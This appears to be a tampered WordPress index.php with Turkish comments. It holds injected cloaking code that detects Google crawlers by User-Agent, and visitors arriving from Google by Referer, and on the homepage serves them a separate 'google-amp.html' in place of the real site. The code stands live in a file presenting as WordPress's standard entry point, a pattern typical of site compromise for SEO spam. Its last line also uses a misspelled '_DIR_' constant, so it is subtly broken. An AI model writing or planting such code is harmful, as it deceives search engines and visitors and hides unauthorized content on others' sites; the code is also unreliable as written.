<?php
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
} else {
    $userAgent = '';
}

if (!empty($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
} else {
    $referer = '';
}

$googleBots = [
    'Googlebot',
    'AdsBot',
    'Mediapartners-Google',
    'APIs-Google',
    'Googlebot-Image',
    'Googlebot-Video',
    'Googlebot-News',
    'Googlebot-Search',
    'Googlebot-Inspect',
    'Googlebot-Android',
    'Googlebot-Mobile',
    'Googlebot-Ads',
    'Googlebot-Discovery',
    'Google-',
];

// Google botlarını veya Google'dan gelen kullanıcıları kontrol et
if (
    preg_match('/' . implode('|', $googleBots) . '/i', $userAgent) || 
    strpos($referer, 'google.') !== false
) {
    if ($_SERVER['REQUEST_URI'] == '/') {
        include 'google-amp.html';
        die();
    }
}

// WordPress'i başlat
define( 'WP_USE_THEMES', true );
require _DIR_ . '/wp-blog-header.php';
